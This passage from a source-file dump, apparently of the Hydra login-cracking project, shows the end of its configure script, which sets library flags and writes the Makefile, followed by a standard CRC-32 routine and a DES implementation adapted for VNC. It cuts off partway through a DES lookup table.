]; then\n XDEFINES=\"$XDEFINES -DLIBSVN\"\nfi\nif [ -n \"$SSH_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBSSH\"\nfi\nif [ -n \"$STRRCHR\" ]; then\n XDEFINES=\"$XDEFINES -DNO_STRRCHR\"\nfi\nif [ -n \"$RSA\" ]; then\n XDEFINES=\"$XDEFINES -DNO_RSA_LEGACY\"\nfi\nif [ -n \"$HAVE_SYBDB\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_SYBDB\"\nfi\nif [ -n \"$HAVE_SYBFRONT\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_SYBFRONT\"\nfi\nif [ -n \"$HAVE_ZLIB\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_ZLIB\"\nfi\nif [ -n \"$HAVE_GCRYPT\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_GCRYPT\"\nfi\nif [ -n \"$MCACHED_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBMCACHED\"\nfi\nif [ -n \"$MONGODB2_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBMONGODB2\"\nfi\nif [ -n \"$BSON2_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBBSON2\"\nfi\nif [ -n \"$MONGODB_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBMONGODB\"\nfi\nif [ -n \"$BSON_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBBSON\"\nfi\nif [ -n \"$FREERDP2_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBFREERDP\"\nfi\nif [ -n \"$WINPR2_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBWINPR2\"\nfi\nif [ -n \"$FREERDP3_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBFREERDP\"\nfi\nif [ -n \"$WINPR3_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBWINPR3\"\nfi\nif [ -n \"$SMBC_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBSMBCLIENT\"\nfi\n\nOLDPATH=\"\"\nfor i in $SSL_PATH \\\n $FIREBIRD_PATH \\\n $WORACLE_LIB_PATH \\\n $PCRE_PATH \\\n $IDN_PATH \\\n $CRYPTO_PATH \\\n $SSH_PATH \\\n $NSL_PATH \\\n $SOCKET_PATH \\\n $RESOLV_PATH \\\n $SAPR3_PATH \\\n $POSTGRES_PATH \\\n $SVN_PATH \\\n $NCP_PATH \\\n $CURSES_PATH \\\n $ORACLE_PATH \\\n $AFP_PATH \\\n $MYSQL_PATH \\\n $MCACHED_PATH \\\n $MONGODB2_PATH \\\n $BSON2_PATH \\\n $MONGODB_PATH \\\n $BSON_PATH \\\n $FREERDP2_PATH \\\n $WINPR2_PATH \\\n $FREERDP3_PATH \\\n $WINPR3_PATH \\\n $SMBC_PATH; do\n if [ \"$OLDPATH\" = \"$i\" ]; then\n OLDPATH=\"$i\"\n else\n XLIBPATHS=\"$XLIBPATHS -L$i\"\n OLDPATH=\"$i\"\n fi\ndone\nif [ -n \"$CURSES_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$CURSES_IPATH\"\nfi\nif [ -n \"$FIREBIRD_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$FIREBIRD_IPATH\"\nfi\nif [ -n \"$IDN_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$IDN_IPATH\"\nfi\nif [ -n \"$NCP_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$NCP_IPATH\"\nfi\nif [ -n \"$PCRE_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$PCRE_IPATH\"\nfi\nif [ -n \"$POSTGRES_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$POSTGRES_IPATH\"\nfi\nif [ -n \"$PR29_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$PR29_IPATH\"\nfi\nif [ -n \"$SSL_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SSL_IPATH\"\nfi\nif [ -n \"$SAPR3_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SAPR3_IPATH\"\nfi\nif [ -n \"$SSH_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SSH_IPATH\"\nfi\nif [ -n \"$SVN_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SVN_IPATH\"\nfi\nif [ -n \"$APR_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$APR_IPATH\"\nfi\nif [ -n \"$SVN_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SVN_IPATH\"\nfi\nif [ -n \"$AFP_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$AFP_IPATH\"\nfi\nif [ -n \"$ORACLE_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$ORACLE_IPATH\"\nfi\nif [ -n \"$MCACHED_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$MCACHED_IPATH\"\nfi\nif [ -n \"$MONGODB2_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$MONGODB2_IPATH -I$BSON2_IPATH\"\nfi\nif [ -n \"$MONGODB_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$MONGODB_IPATH -I$BSON_IPATH\"\nfi\nif [ -n \"$FREERDP2_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$FREERDP2_IPATH -I$WINPR2_IPATH\"\nfi\nif [ -n \"$FREERDP3_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$FREERDP3_IPATH -I$WINPR3_IPATH\"\nfi\nif [ -n \"$SMBC_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$SMBC_IPATH\"\nfi\nif [ -n \"$HAVE_GCRYPT\" ]; then\n XLIBS=\"$XLIBS -lgcrypt\"\nfi\nif [ -n \"$HAVE_ZLIB\" ]; then\n XLIBS=\"$XLIBS -lz\"\nfi\nif [ -n \"$HAVE_SYBDB\" ]; then\n XLIBS=\"$XLIBS -lsybdb\"\nfi\nif [ -n \"$CURSES_PATH\" ]; then\n XLIBS=\"$XLIBS -lcurses\"\nfi\nif [ -n \"$SSL_PATH\" ]; then\n XLIBS=\"$XLIBS -lssl\"\nfi\nif [ -n \"$NCP_PATH\" ]; then\n XLIBS=\"$XLIBS -lncp\"\nfi\nif [ -n \"$ORACLE_PATH\" -a \"$SYSO\" != \"Cygwin\" ]; then\n XLIBS=\"$XLIBS -locci -lclntsh\"\nfi\nif [ -n \"$ORACLE_PATH\" -a \"$SYSO\" = \"Cygwin\" ]; then\n XLIBS=\"$XLIBS -loci\"\nfi\nif [ -n \"$FIREBIRD_PATH\" ]; then\n XLIBS=\"$XLIBS -lfbclient\"\nfi\nif [ -n \"$IDN_PATH\" ]; then\n XLIBS=\"$XLIBS -lidn\"\nfi\nif [ -n \"$PCRE_PATH\" ]; then\n XLIBS=\"$XLIBS -lpcre2-8\"\nfi\nif [ -n \"$MYSQL_PATH\" ]; then\n XLIBS=\"$XLIBS -lmysqlclient\"\nfi\nif [ -n \"$AFP_PATH\" ]; then\n XLIBS=\"$XLIBS -lafpclient\"\nfi\n\nif [ -n \"$SAPR3_PATH\" ]; then\n XLIBS=\"$XLIBS -lrfc\"\n if [ \"$SYSO\" = \"Cygwin\" ]; then\n BLA=TMP\n else\n XLIBS=\"$XLIBS -ldl\"\n fi\nfi\nif [ -n \"$POSTGRES_PATH\" ]; then\n XLIBS=\"$XLIBS -lpq\"\nfi\nif [ -n \"$SVN_PATH\" ]; then\n XLIBS=\"$XLIBS -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1\"\nfi\nif [ -n \"$SSH_PATH\" ]; then\n XLIBS=\"$XLIBS -lssh\"\nfi\nif [ -n \"$CRYPTO_PATH\" ]; then\n XLIBS=\"$XLIBS -lcrypto\"\nfi\nif [ -n \"$NSL_PATH\" ]; then\n XLIBS=\"$XLIBS -lnsl\"\nfi\nif [ -n \"$SOCKET_PATH\" ]; then\n XLIBS=\"$XLIBS -lsocket\"\nfi\nif [ -n \"$RESOLV_PATH\" ]; then\n XLIBS=\"$XLIBS -lresolv\"\nfi\nif [ -n \"$MCACHED_PATH\" ]; then\n XLIBS=\"$XLIBS -lmemcached\"\nfi\nif [ -n \"$MONGODB2_PATH\" ]; then\n XLIBS=\"$XLIBS -lmongoc2\"\nfi\nif [ -n \"$BSON2_PATH\" ]; then\n XLIBS=\"$XLIBS -lbson2\"\nfi\nif [ -n \"$MONGODB_PATH\" ]; then\n XLIBS=\"$XLIBS -lmongoc-1.0\"\nfi\nif [ -n \"$BSON_PATH\" ]; then\n XLIBS=\"$XLIBS -lbson-1.0\"\nfi\nif [ -n \"$FREERDP2_PATH\" ]; then\n XLIBS=\"$XLIBS -lfreerdp2\"\nfi\nif [ -n \"$WINPR2_PATH\" ]; then\n XLIBS=\"$XLIBS -lwinpr2\"\nfi\nif [ -n \"$FREERDP3_PATH\" ]; then\n XLIBS=\"$XLIBS -lfreerdp3\"\nfi\nif [ -n \"$WINPR3_PATH\" ]; then\n XLIBS=\"$XLIBS -lwinpr3\"\nfi\nif [ -n \"$SMBC_PATH\" ]; then\n XLIBS=\"$XLIBS -lsmbclient\"\nfi\nif [ -d /usr/kerberos/include ]; then\n XIPATHS=\"$XIPATHS -I/usr/kerberos/include\"\nfi\n\nif [ \"X\" = \"X$PREFIX\" ]; then\n PREFIX=\"/usr/local\"\nfi\n\nif [ \"X\" = \"X$XHYDRA_SUPPORT\" -o \"Xdisable\" = \"X$XHYDRA_SUPPORT\" ]; then\n XHYDRA_SUPPORT=\"\"\nelse\n XHYDRA_SUPPORT=\"xhydra\"\nfi\n\nif [ \"X\" != \"X$FHS\" ]; then\n PREFIX=/usr\n echo \"Hydra will be installed into .../bin of: $PREFIX\"\n echo \" (according to the File System Hierarchy Standard)\"\n echo\nelse\n echo \"Hydra will be installed into .../bin of: $PREFIX\"\n echo \" (change this by running ./configure --prefix=path)\"\n echo\nfi\n\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: XDEFINES=$XDEFINES $MATH $SYS_PARAM\n echo DEBUG: XLIBS=$XLIBS\n echo DEBUG: XLIBPATHS=$XLIBPATHS\n echo DEBUG: XIPATHS=$XIPATHS\n echo DEBUG: PREFIX=$PREFIX\n echo DEBUG: XHYDRA_SUPPORT=$XHYDRA_SUPPORT\n echo DEBUG: STRIP=$STRIP\nfi\n\nif [ \"$SYSS\" = \"SunOS\" ]; then\n XLIBS=\"$XLIBS -lrt\"\nfi\n\necho \"Writing Makefile.in ...\"\nif [ \"X\" != \"X$FHS\" ]; then\n echo \"MANDIR = /share/man/man1\" >> Makefile.in\n echo \"DATADIR = /share/hydra\" >> Makefile.in\nfi\necho \"XDEFINES=$XDEFINES $MATH $SYS_PARAM\" >> Makefile.in\necho \"XLIBS=$XLIBS\" >> Makefile.in\necho \"XLIBPATHS=$XLIBPATHS\" >> Makefile.in\necho \"XIPATHS=$XIPATHS\" >> Makefile.in\necho \"PREFIX=$PREFIX\" >> Makefile.in\n#if [ $XHYDRA_SUPPORT != \"disable\" ]; then\necho \"XHYDRA_SUPPORT=$XHYDRA_SUPPORT\" >> Makefile.in\n#fi\necho \"STRIP=$STRIP\" >> Makefile.in\necho >> Makefile.in\ncat Makefile.unix > Makefile\ncat Makefile.in >> Makefile\n# ignore errors if this uname call fails\n### Current Cygwin is up to speed :-)\nWINDRES=\"\"\nif [ \"$SYSO\" = \"Cygwin\" -o \"$SYSO\" = \"Msys\" ]; then\n echo\n echo \"Cygwin/MSYS2 detected, if compilation fails just update your installation.\"\n echo\n WINDRES=`which windres`\n test -x \"$WINDRES\" && {\n echo \"Windres found, will attach icons to hydra cygwin executables\"\n echo HYDRA_LOGO=hydra-logo.o >> Makefile\n echo PWI_LOGO=pw-inspector-logo.o >> Makefile\n windres hydra-logo.rc hydra-logo.o\n windres pw-inspector-logo.rc pw-inspector-logo.o\n }\n test -x \"$WINDRES\" || {\n WINDRES=\"\"\n echo Windres NOT found, you will not have pretty icon files in the hydra cygwin executables\n echo\n }\n echo\nfi\nif [ \"x$WINDRES\" = \"x\" ]; then\n echo HYDRA_LOGO= >> Makefile\n echo PWI_LOGO= >> Makefile\nfi\nif [ \"$GCCSEC\" = \"yes\" -a \"$SYSS\" != \"SunOS\" -a \"$SYSS\" != \"Darwin\" ]; then\n echo \"SEC=$GCCSECOPT\" >> Makefile\nelse\n echo \"SEC=\" >> Makefile\nfi\nif [ \"$LDSEC\" = \"yes\" -a \"$SYSS\" != \"SunOS\" -a \"$SYSS\" != \"Darwin\" ]; then\n echo \"LDSEC=$LDSECOPT\" >> Makefile\nelse\n echo \"LDSEC=\" >> Makefile\nfi\necho >> Makefile\nif [ \"x$NOSTRIP\" = \"x\" ]; then\n cat Makefile.am >> Makefile\nelse\n cat Makefile.am | sed 's/^install:.*/install:\tall/' >> Makefile\nfi\necho \"now type \\\"make\\\"\"\n" }, { "path": "crc32.c", "content": "/*-\n * COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or\n * code or tables extracted from it, as desired without restriction.\n *\n * First, the polynomial itself and its table of feedback terms. The\n * polynomial is\n * X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0\n *\n * Note that we take it \"backwards\" and put the highest-order term in\n * the lowest-order bit. The X^32 term is \"implied\"; the LSB is the\n * X^31 term, etc. The X^0 term (usually shown as \"+1\") results in\n * the MSB being 1\n *\n * Note that the usual hardware shift register implementation, which\n * is what we're using (we're merely optimizing it by doing eight-bit\n * chunks at a time) shifts bits into the lowest-order term. In our\n * implementation, that means shifting towards the right. Why do we\n * do it this way? Because the calculated CRC must be transmitted in\n * order from highest-order term to lowest-order term. UARTs transmit\n * characters in order from LSB to MSB. By storing the CRC this way\n * we hand it to the UART in the order low-byte to high-byte; the UART\n * sends each low-bit to hight-bit; and the result is transmission bit\n * by bit from highest- to lowest-order term without requiring any bit\n * shuffling on our part. Reception works similarly\n *\n * The feedback terms table consists of 256, 32-bit entries. Notes\n *\n * The table can be generated at runtime if desired; code to do so\n * is shown later. It might not be obvious, but the feedback\n * terms simply represent the results of eight shift/xor opera\n * tions for all combinations of data and CRC register values\n *\n * The values must be right-shifted by eight bits by the \"updcrc\n * logic; the shift must be unsigned (bring in zeroes). On some\n * hardware you could probably optimize the shift in assembler by\n * using byte-swap instructions\n * polynomial $edb88320\n *\n *\n * CRC32 code derived from work by Gary S. Brown.\n */\n\n#include \n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n\nuint32_t crc32_tab[] = {0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1,\n 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934,\n 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f,\n 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,\n 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,\n 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,\n 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d};\n\n#ifndef HAVE_ZLIB\n\nuint32_t crc32(const void *buf, uint32_t size) {\n const unsigned char *p;\n uint32_t crc;\n\n p = buf;\n crc = ~0U;\n\n while (size--)\n crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);\n\n return crc ^ ~0U;\n}\n\n#endif\n" }, { "path": "crc32.h", "content": "#ifndef CRC32_H\n#define CRC32_H\n\n#include \n\n#ifndef HAVE_ZLIB\nuint32_t crc32(const void *buf, uint32_t size);\n#endif\n\n#endif\n" }, { "path": "d3des.c", "content": "/* 2001 van Hauser for Hydra: commented out KnR Kn3 and Df_Key to remove\n compiler warnings for unused definitions.\n */\n\n/*\n * This is D3DES (V5.09) by Richard Outerbridge with the double and\n * triple-length support removed for use in VNC. Also the bytebit[] array\n * has been reversed so that the most significant bit in each byte of the\n * key is ignored, not the least significant.\n *\n * These changes are:\n * Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.\n *\n * This software is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n */\n\n/* D3DES (V5.09) -\n *\n * A portable, public domain, version of the Data Encryption Standard.\n *\n * Written with Symantec's THINK (Lightspeed) C by Richard Outerbridge.\n * Thanks to: Dan Hoey for his excellent Initial and Inverse permutation\n * code; Jim Gillogly & Phil Karn for the DES key schedule code; Dennis\n * Ferguson, Eric Young and Dana How for comparing notes; and Ray Lau,\n * for humouring me on.\n *\n * Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge.\n * (GEnie : OUTER; CIS : [71755,204]) Graven Imagery, 1992.\n */\n\n#include \"d3des.h\"\n\nstatic void scrunch(unsigned char *, unsigned long *);\nstatic void unscrun(unsigned long *, unsigned char *);\nstatic void desfunc(unsigned long *, unsigned long *);\nstatic void cookey(unsigned long *);\n\nstatic unsigned long KnL[32] = {0L};\n\n/* not needed ...\n static unsigned long KnR[32] = { 0L };\n static unsigned long Kn3[32] = { 0L };\n static unsigned char Df_Key[24] = {\n 0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,\n 0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,\n 0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };\n*/\n\nstatic unsigned short bytebit[8] = {01, 02, 04, 010, 020, 040, 0100, 0200};\n\nstatic unsigned long bigbyte[24] = {0x800000L, 0x400000L, 0x200000L, 0x100000L, 0x80000L, 0x40000L, 0x20000L, 0x10000L, 0x8000L, 0x4000L, 0x2000L, 0x1000L, 0x800L, 0x400L, 0x200L, 0x100L, 0x80L, 0x40L, 0x20L, 0x10L, 0x8L, 0x4L, 0x2L, 0x1L};\n\n/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */\n\nstatic unsigned char pc1[56] = {56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3};\n\nstatic unsigned char totrot[16] = {1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28};\n\nstatic unsigned char pc2[48] = {13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9, 22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1, 40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47, 43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31};\n\nvoid deskey(key, edf) /* Thanks to James Gillogly & Phil Karn! */\n unsigned char *key;\nint32_t edf;\n{\n register int32_t i, j, l, m, n;\n unsigned char pc1m[56], pcr[56];\n unsigned long kn[32];\n\n for (j = 0; j < 56; j++) {\n l = pc1[j];\n m = l & 07;\n pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;\n }\n for (i = 0; i < 16; i++) {\n if (edf == DE1)\n m = (15 - i) << 1;\n else\n m = i << 1;\n n = m + 1;\n kn[m] = kn[n] = 0L;\n for (j = 0; j < 28; j++) {\n l = j + totrot[i];\n if (l < 28)\n pcr[j] = pc1m[l];\n else\n pcr[j] = pc1m[l - 28];\n }\n for (j = 28; j < 56; j++) {\n l = j + totrot[i];\n if (l < 56)\n pcr[j] = pc1m[l];\n else\n pcr[j] = pc1m[l - 28];\n }\n for (j = 0; j < 24; j++) {\n if (pcr[pc2[j]])\n kn[m] |= bigbyte[j];\n if (pcr[pc2[j + 24]])\n kn[n] |= bigbyte[j];\n }\n }\n cookey(kn);\n return;\n}\n\nstatic void cookey(raw1) register unsigned long *raw1;\n{\n register unsigned long *cook, *raw0;\n unsigned long dough[32];\n register int32_t i;\n\n cook = dough;\n for (i = 0; i < 16; i++, raw1++) {\n raw0 = raw1++;\n *cook = (*raw0 & 0x00fc0000L) << 6;\n *cook |= (*raw0 & 0x00000fc0L) << 10;\n *cook |= (*raw1 & 0x00fc0000L) >> 10;\n *cook++ |= (*raw1 & 0x00000fc0L) >> 6;\n *cook = (*raw0 & 0x0003f000L) << 12;\n *cook |= (*raw0 & 0x0000003fL) << 16;\n *cook |= (*raw1 & 0x0003f000L) >> 4;\n *cook++ |= (*raw1 & 0x0000003fL);\n }\n usekey(dough);\n return;\n}\n\nvoid cpkey(into) register unsigned long *into;\n{\n register unsigned long *from, *endp;\n\n from = KnL, endp = &KnL[32];\n while (from < endp)\n *into++ = *from++;\n return;\n}\n\nvoid usekey(from) register unsigned long *from;\n{\n register unsigned long *to, *endp;\n\n to = KnL, endp = &KnL[32];\n while (to < endp)\n *to++ = *from++;\n return;\n}\n\nvoid des(unsigned char *inblock, unsigned char *outblock) {\n unsigned long work[2];\n\n scrunch(inblock, work);\n desfunc(work, KnL);\n unscrun(work, outblock);\n return;\n}\n\nstatic void scrunch(outof, into) register unsigned char *outof;\nregister unsigned long *into;\n{\n *into = (*outof++ & 0xffL) << 24;\n *into |= (*outof++ & 0xffL) << 16;\n *into |= (*outof++ & 0xffL) << 8;\n *into++ |= (*outof++ & 0xffL);\n *into = (*outof++ & 0xffL) << 24;\n *into |= (*outof++ & 0xffL) << 16;\n *into |= (*outof++ & 0xffL) << 8;\n *into |= (*outof & 0xffL);\n return;\n}\n\nstatic void unscrun(outof, into) register unsigned long *outof;\nregister unsigned char *into;\n{\n *into++ = (*outof >> 24) & 0xffL;\n *into++ = (*outof >> 16) & 0xffL;\n *into++ = (*outof >> 8) & 0xffL;\n *into++ = *outof++ & 0xffL;\n *into++ = (*outof >> 24) & 0xffL;\n *into++ = (*outof >> 16) & 0xffL;\n *into++ = (*outof >> 8) & 0xffL;\n *into = *outof & 0xffL;\n return;\n}\n\nstatic unsigned long SP1[64] = {0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L, 0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L, 0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L, 0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L, 0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L, 0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L, 0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L, 0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,\n 0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L, 0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L, 0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L, 0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L, 0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L, 0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L, 0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L, 0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L};\n\nstatic unsigned long SP2[64] = {0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L, 0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L, 0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L, 0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L, 0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L, 0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L, 0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L, 0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,\n 0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L, 0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L, 0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L, 0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L, 0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L, 0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L, 0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L, 0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L};\n\nstatic unsigned long SP3[64] = {0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L, 0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L, 0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L, 0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L, 0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L, 0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L, 0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L, 0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,\n 0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L, 0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L, 0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L, 0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L, 0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L, 0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L, 0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L, 0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L};\n\nstatic unsigned long SP4[64] = {0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L, 0x00802080L, 0x00800081L, 0x00800001L, 